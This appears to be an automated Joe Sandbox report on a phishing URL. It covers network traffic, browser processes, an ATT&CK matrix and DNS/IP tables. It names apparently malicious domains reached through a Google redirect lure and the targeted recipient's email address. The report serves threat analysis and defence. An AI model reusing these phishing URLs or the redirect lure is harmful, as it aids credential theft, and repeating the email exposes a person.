    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49791 version: TLS 1.2
    Source: classification engineClassification label: mal64.phis.win@21/45@32/13
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1976,i,8441844483652794743,4114512088711831297,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/bill.wafford@qurateretail.com"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1976,i,8441844483652794743,4114512088711831297,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected

    Persistence and Installation Behavior

    barindex
    Source: EmailJoeBoxAI: AI detected Typosquatting in URL: URL: http://ir.nbaikp3.sa.com
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Scripting
    Boot or Logon Initialization Scripts1
    Deobfuscate/Decode Files or Information
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/bill.wafford@qurateretail.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://getbootstrap.com/)0%URL Reputationsafe
    https://fontawesome.com/license/free0%URL Reputationsafe
    https://fontawesome.com0%URL Reputationsafe
    https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css0%URL Reputationsafe
    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    jsdelivr.map.fastly.net
    151.101.65.229
    truefalse
      unknown
      bg.microsoft.map.fastly.net
      199.232.210.172
      truefalse
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          unknown
          getplancgfe.ru
          172.67.130.97
          truefalse
            unknown
            www.google.co.th
            172.217.18.3
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.24.14
              truefalse
                unknown
                ecoutura.sa.com
                188.114.97.3
                truefalse
                  unknown
                  challenges.cloudflare.com
                  104.18.95.41
                  truefalse
                    unknown
                    s-part-0017.t-0009.t-msedge.net
                    13.107.246.45
                    truefalse
                      unknown
                      www.google.com
                      142.250.185.196
                      truefalse
                        unknown
                        ir.nbaikp3.sa.com
                        82.197.65.139
                        truetrue
                          unknown
                          fp2e7a.wpc.phicdn.net
                          192.229.221.95
                          truefalse
                            unknown
                            cdn.jsdelivr.net
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              https://ecoutura.sa.com/9o93/#Mbill.wafford@qurateretail.comtrue
                                unknown
                                https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.jsfalse
                                  unknown
                                  https://getplancgfe.ru/favicon.icofalse
                                    unknown
                                    https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                      unknown
                                      https://ecoutura.sa.com/favicon.icofalse
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8dbbfc65ff9e6b31/1730465170458/acbb53e218aec4a036a5867779de4914a70d4321a24be75c0101110a335ab166/FGnjkYIDdV7w3fLfalse
                                          unknown
                                          http://ir.nbaikp3.sa.com/favicon.icofalse
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8dbbfc65ff9e6b31&lang=autofalse
                                              unknown
                                              http://ir.nbaikp3.sa.com/delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateretail.comfalse
                                                unknown
                                                https://www.google.co.th/amp/ir.nbaikp3.sa.com/delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateretail.comfalse
                                                  unknown
                                                  https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.cssfalse
                                                    unknown
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8dbbfc65ff9e6b31/1730465170459/bzBIJqatPd8Kn9gfalse
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                        unknown
                                                        https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2false
                                                          unknown
                                                          https://getplancgfe.ru//#inventoryfalse
                                                            unknown
                                                            https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2false
                                                              unknown
                                                              https://a.nel.cloudflare.com/report/v4?s=0uYyuOXxMuQ1gvbJJVzRhKKVQMUdjh5eiiYnszarNXl9voZneT9WEzAd3OwoHaoaW%2FCazykFRb72kgT8pIxcvEwGSHHUUpy3W9lquW%2FSonCyXsutrWYTgkqvGdFu52LLCgU%3Dfalse
                                                                unknown
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1024805803:1730463054:b1rgIEdpWeHxmQJHck6RV8EmMMFOLeJcpMeBvebYgsc/8dbbfc65ff9e6b31/YskjOMlt.092AVHG.UE3lCUdd4zGhRJt1uSalhQrUMU-1730465168-1.1.1.1-yGD2l9ovY9dDpnf_eBS_OXrkjwGpYqg3WZZgwfmyKhkt414YGGj1tgkl1n9lqZ89false
                                                                  unknown
                                                                  https://ecoutura.sa.com/9o93/false
                                                                    unknown
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ndzua/0x4AAAAAAAymN2-m7RRX_jxe/auto/fbE/normal/auto/false
                                                                      unknown
                                                                      https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://getplancgfe.ru/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.jsfalse
                                                                        unknown
                                                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://getplancgfe.ru//false
                                                                          unknown
                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                          https://cdn.jsdelivr.net/npm/bootstrapchromecache_83.2.dr, chromecache_68.2.drfalse
                                                                            unknown
                                                                            https://getplancgfe.ru//#serviceschromecache_83.2.dr, chromecache_68.2.drfalse
                                                                              unknown
                                                                              https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_67.2.drfalse
                                                                                unknown
                                                                                https://getplancgfe.ru//#contactchromecache_83.2.dr, chromecache_68.2.drfalse
                                                                                  unknown
                                                                                  https://linkedin.com/in/getplancgfe.ruchromecache_83.2.dr, chromecache_68.2.drfalse
                                                                                    unknown
                                                                                    https://getbootstrap.com/)chromecache_67.2.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://fontawesome.com/license/freechromecache_82.2.dr, chromecache_65.2.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://fontawesome.comchromecache_82.2.dr, chromecache_65.2.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://x.com/getplancgfe.ruchromecache_83.2.dr, chromecache_68.2.drfalse
                                                                                      unknown
                                                                                      https://instagram.com/getplancgfe.ruchromecache_83.2.dr, chromecache_68.2.drfalse
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.17.24.14
                                                                                        cdnjs.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        172.67.130.97
                                                                                        getplancgfe.ruUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        151.101.193.229
                                                                                        unknownUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        172.217.18.3
                                                                                        www.google.co.thUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        151.101.65.229
                                                                                        jsdelivr.map.fastly.netUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        104.18.95.41
                                                                                        challenges.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        239.255.255.250
                                                                                        unknownReserved
                                                                                        unknownunknownfalse
                                                                                        142.250.185.196
                                                                                        www.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        188.114.97.3
                                                                                        ecoutura.sa.comEuropean Union
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        35.190.80.1
                                                                                        a.nel.cloudflare.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        104.21.8.81
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        82.197.65.139
                                                                                        ir.nbaikp3.sa.comUnited Kingdom
                                                                                        25577C4L-ASGBtrue
                                                                                        IP
                                                                                        192.168.2.4
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1546697
                                                                                        Start date and time:2024-11-01 13:44:52 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 3m 12s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:browseurl.jbs
                                                                                        Sample URL:https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/bill.wafford@qurateretail.com
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:7
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • EGA enabled
